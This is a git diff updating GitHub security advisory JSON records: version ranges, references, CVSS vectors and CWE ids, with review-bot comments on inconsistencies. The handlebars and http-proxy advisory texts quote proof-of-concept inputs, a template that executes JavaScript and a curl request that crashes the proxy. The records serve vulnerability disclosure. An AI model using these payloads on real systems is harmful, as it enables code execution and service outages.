"modified": "2024-02-05T11:13:08Z", "published": "2020-05-13T23:40:09Z", "aliases": [ "CVE-2020-11069" @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ 
@@ -62,6 +100,18 @@
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11069"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11069.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11069.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-006"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json b/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json
index 84f664f9edd91..cb093e6992873 100644
--- a/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json
+++ b/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "2.13.0"
 },
 {
 "fixed": "2.13.2"
@@ -44,7 +44,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "2.13.0"
 },
 {
 "fixed": "2.13.2"
@@ -52,6 +52,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.12.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.12.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3.2" + } + ] + } + ] } ], "references": [ diff --git a/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json b/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json index 95506a97e8a28..b4990a46c6a43 100644 --- a/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json +++ b/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.20" + } + ] + } + ] } ], "references": [ 
@@ -63,6 +101,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15099"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-15099.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-15099.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/TYPO3/TYPO3.CMS"
diff --git a/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json b/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json
index a8069e8ad7f77..30a5d50ce5fa0 100644
--- a/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json
+++ b/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-43jj-2rwc-2m3f",
- "modified": "2021-09-22T21:03:46Z",
+ "modified": "2024-02-01T19:02:40Z",
 "published": "2020-07-15T17:38:04Z",
 "aliases": [
 "CVE-2019-14273"
@@ -91,6 +91,6 @@
 "severity": "MODERATE",
 "github_reviewed": true,
 "github_reviewed_at": "2020-07-15T17:33:55Z",
- "nvd_published_at": null
+ "nvd_published_at": "2019-09-26T12:15:11Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json b/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json
index 5ce4f46bfa15b..4aefcc723af1d 100644
--- a/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json
+++ b/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4h44-w6fm-548g",
- "modified": "2021-11-19T15:44:20Z",
+ "modified": "2024-02-05T10:43:51Z",
 "published": "2020-07-29T16:15:12Z",
 "aliases": [
 "CVE-2020-15086"
@@ -52,9 +52,17 @@
 "type": "WEB",
 "url": "https://github.com/FriendsOfTYPO3/mediace/commit/fa29ffd3e8b275782a8600d2406e1b1e5e16ae75"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/friendsoftypo3/mediace/CVE-2020-15086.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/FriendsOfTYPO3/mediace"
+ },
+ {
+ "type": "WEB",
+ "url": "https://typo3.org/security/advisory/typo3-ext-sa-2020-014"
 }
 ],
 "database_specific": {
@@ -64,7 +72,7 @@
 "CWE-325",
 "CWE-502"
 ],
- "severity": "HIGH",
+ "severity": "CRITICAL",
 "github_reviewed": true,
 "github_reviewed_at": "2020-07-29T16:09:56Z",
 "nvd_published_at": "2020-07-29T17:15:00Z"
diff --git a/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json b/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json
index ec7be16b7760b..a7b2ac9330d8d 100644
--- a/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json
+++ b/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json
@@ -52,6 +52,44 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.0.0"
+ },
+ {
+ "fixed": "10.4.6"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "9.0.0"
+ },
+ {
+ "fixed": "9.5.20"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -71,6 +109,14 @@
 "type": "WEB",
 "url": "https://github.com/TYPO3/TYPO3.CMS/commit/85d3e70dff35a99ef53f4b561114acfa9e5c47e1"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-15098.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-15098.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/TYPO3/TYPO3.CMS"
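Review bot: `"severity": "CRITICAL"` in the `@@ -64,7 +72,7 @@` hunk of GHSA-4h44-w6fm-548g changes only the `database_specific` label; the CVSS_V3 entry in the top-level `severity` array, which this label is presumably derived from, lies outside the hunk and is not touched. If that vector still scores in the HIGH band the two fields will disagree, and downstream tooling keys alert thresholds on whichever one it reads; the commit should either update the vector alongside the label or record why the label is being raised independently. The same label-only bump (`MODERATE` to `HIGH`) appears in `@@ -171,7 +175,7 @@` of GHSA-hpjm-3ww5-6cpf.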
diff --git a/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json b/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json index e8942d33387b7..0367e1fbbba36 100644 --- a/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json +++ b/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.14" + "fixed": "1.4.7" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.5.0" }, { - "fixed": "1.4.7" + "fixed": "1.5.2" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.5.0" + "introduced": "1.6.0" }, { - "fixed": "1.5.2" + "fixed": "1.6.4" } ] } @@ -82,10 +82,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.6.0" + "introduced": "1.0.0" }, { - "fixed": "1.6.4" + "fixed": "1.3.14" } ] } @@ -105,6 +105,10 @@ "type": "WEB", "url": "https://github.com/Sylius/SyliusResourceBundle/commit/73d9aba182947473a5935b31caf65ca263091e00" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/resource-bundle/CVE-2020-15146.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Sylius/SyliusResourceBundle" diff --git a/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json b/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json index e81d8cba607f6..766c90502f018 100644 --- a/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json +++ b/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.14" + "fixed": "1.4.7" } ] } 
@@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.5.0" }, { - "fixed": "1.4.7" + "fixed": "1.5.2" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.5.0" + "introduced": "1.6.0" }, { - "fixed": "1.5.2" + "fixed": "1.6.4" } ] } @@ -82,10 +82,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.6.0" + "introduced": "1.0.0" }, { - "fixed": "1.6.4" + "fixed": "1.3.14" } ] } @@ -105,6 +105,10 @@ "type": "WEB", "url": "https://github.com/Sylius/SyliusResourceBundle/commit/73ed8b8bb083f36c30ad7c3cec336f65d6a80650" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/resource-bundle/CVE-2020-15143.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Sylius/SyliusResourceBundle" diff --git a/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json b/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json index cd7db0c501c52..933fb2904906d 100644 --- a/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json +++ b/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2cf5-4w76-r9qv", - "modified": "2020-08-31T18:54:52Z", + "modified": "2024-01-29T20:54:51Z", "published": "2020-09-04T14:57:38Z", "aliases": [ 
@@ -9,7 +9,10 @@ "summary": "Arbitrary Code Execution in handlebars", "details": "Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\nThe following template can be used to demonstrate the vulnerability: \n```{{#with \"constructor\"}}\n\t{{#with split as |a|}}\n\t\t{{pop (push \"alert('Vulnerable Handlebars JS');\")}}\n\t\t{{#with (concat (lookup join (slice 0 1)))}}\n\t\t\t{{#each (slice 2 3)}}\n\t\t\t\t{{#with (apply 0 a)}}\n\t\t\t\t\t{{.}}\n\t\t\t\t{{/with}}\n\t\t\t{{/each}}\n\t\t{{/with}}\n\t{{/with}}\n{{/with}}```\n\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.2 or later.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L" + } ], "affected": [ { @@ -59,7 +62,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-94" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json b/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json index 44169c4e3afd5..83ee7e53fb28c 100644 --- a/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json +++ b/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json @@ -47,6 +47,14 @@ { "type": "WEB", "url": "https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2020-15148.yaml" + }, + { + "type": "WEB", + "url": "https://www.yiiframework.com/news/303/yii-2-0-38" } ], "database_specific": { 
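Review bot: The CVSS vector added in `@@ -9,7 +9,10 @@` of GHSA-2cf5-4w76-r9qv scores the handlebars issue as `AV:L/AC:L/PR:L/UI:R`, i.e. local access with prior privileges and user interaction, yet the `details` text on the same hunk describes attackers submitting templates that execute on a server processing them or in a victim's browser, which reads as a network-reachable, unauthenticated vector. The vector still lands in the HIGH band, so `database_specific.severity` stays consistent, but the attack-vector metrics look inverted relative to the description and are worth re-checking against the canonical source before this is published. `CWE-94` in the second hunk does match the description.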
diff --git a/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json b/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json index 2f9b94127813f..2ebf7d641eada 100644 --- a/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json +++ b/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6x33-pw7p-hmpq", - "modified": "2020-08-31T19:01:05Z", + "modified": "2024-01-29T20:57:00Z", "published": "2020-09-04T17:59:49Z", "aliases": [ @@ -9,7 +9,10 @@ "summary": "Denial of Service in http-proxy", "details": "Versions of `http-proxy` prior to 1.18.1 are vulnerable to Denial of Service. An HTTP request with a long body triggers an `ERR_HTTP_HEADERS_SENT` unhandled exception that crashes the proxy server. This is only possible when the proxy server sets headers in the proxy request using the `proxyReq.setHeader` function. \n\nFor a proxy server running on `http://localhost:3000`, the following curl request triggers the unhandled exception: \n```curl -XPOST http://localhost:3000 -d \"$(python -c 'print(\"x\"*1025)')\"```\n\n\n## Recommendation\n\nUpgrade to version 1.18.1 or later", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ { @@ -53,7 +56,8 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-184", + "CWE-693" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json b/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json index 2c6bbe6fa9aa1..e9288bcc93780 100644 --- a/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json +++ b/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json 
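Review bot: The CWE ids added in `@@ -53,7 +56,8 @@` of GHSA-6x33-pw7p-hmpq (`CWE-184`, `CWE-693`) describe an incomplete denylist and a protection-mechanism failure, while the `details` text above describes an unhandled `ERR_HTTP_HEADERS_SENT` exception that crashes the proxy, which is an exception-handling weakness. `CWE-248` (Uncaught Exception) or `CWE-755` (Improper Handling of Exceptional Conditions) would match the description more closely; if the ids were imported from an upstream source as-is that is fine to keep, but the mismatch deserves a second look since CWE ids drive category-level reporting downstream. The CVSS vector added in the first hunk (`AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`) is consistent with both the description and the `HIGH` label.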
@@ -105,6 +105,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/d9910e0b33a2e0f993abff41c6fbc86951b66d78" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-kernel/CVE-2020-15094.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-15094.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -124,6 +132,10 @@ { "type": "WEB", "url": "https://packagist.org/packages/symfony/symfony" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-15094" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json b/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json index 5909654b68913..6f2cb618cfd7a 100644 --- a/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json +++ b/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json @@ -53,6 +53,63 @@ } ] }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.52" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.10.0" + }, + { + "fixed": "4.10.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -70,9 +127,6 @@ } ] } - ], - "versions": [ - "4.10.0" ] } ], 
@@ -93,6 +147,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/insert-tag-injection-in-forms.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2020-25768.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2020-25768.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json b/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json index 3d46b3c5a0ea8..9167ed0d2192f 100644 --- a/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json +++ b/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.7.0" }, { - "fixed": "1.6.9" + "fixed": "1.7.9" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.7.0" + "introduced": "1.8.0" }, { - "fixed": "1.7.9" + "fixed": "1.8.3" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.8.0" + "introduced": "1.0.0" }, { - "fixed": "1.8.3" + "fixed": "1.6.9" } ] } @@ -86,6 +86,10 @@ "type": "WEB", "url": "https://github.com/Sylius/Sylius/commit/60636d711a4011e8694d10d201b53632c7e8ecaf" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/sylius/CVE-2020-15245.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Sylius/Sylius" diff --git a/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json b/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json index 94b364bf874b8..6b84c02b41e90 100644 --- a/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json 
+++ b/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json @@ -147,6 +147,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.6" + } + ] + } + ] } ], "references": [ @@ -162,6 +238,18 @@ "type": "WEB", "url": "https://github.com/TYPO3/Fluid/commit/9ef6a8ffff2e812025fc0701b4ce72eea6911a3d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-15241.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-15241.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3fluid/fluid/CVE-2020-15241.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/Fluid" diff --git a/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json b/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json index edfd5cd03fe15..427ea7be2b879 100644 --- a/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json +++ b/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json 
@@ -139,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15227" }, + { + "type": "WEB", + "url": "https://blog.nette.org/en/cve-2020-15227-potential-remote-code-execution-vulnerability" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/nette/application/CVE-2020-15227.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/nette/application" diff --git a/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json b/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json index b114b7ca7e99b..cd2d4f456cca6 100644 --- a/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json +++ b/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-954j-f27r-cj52", - "modified": "2021-01-07T22:40:37Z", + "modified": "2024-02-05T11:15:53Z", "published": "2020-11-23T21:18:36Z", "aliases": [ "CVE-2020-26228" @@ -52,6 +52,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] } ], "references": [ 
@@ -63,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26228" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-26228.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-26228.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-011" @@ -75,6 +159,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2020-11-23T21:10:32Z", - "nvd_published_at": null + "nvd_published_at": "2020-11-23T21:15:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json b/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json index d5c6311fb683c..2dd31e053692e 100644 --- a/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json +++ b/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hpjm-3ww5-6cpf", - "modified": "2021-01-07T22:41:42Z", + "modified": "2024-02-07T18:52:28Z", "published": "2020-11-18T21:06:07Z", "aliases": [ "CVE-2020-26216" @@ -162,6 +162,10 @@ "type": "WEB", "url": "https://github.com/TYPO3/Fluid/commit/f20db4e74cf9803c6cffca2ed2f03e1b0b89d0dc" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3fluid/fluid/CVE-2020-26216.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-009" @@ -171,7 +175,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2020-11-17T20:30:15Z", "nvd_published_at": null 
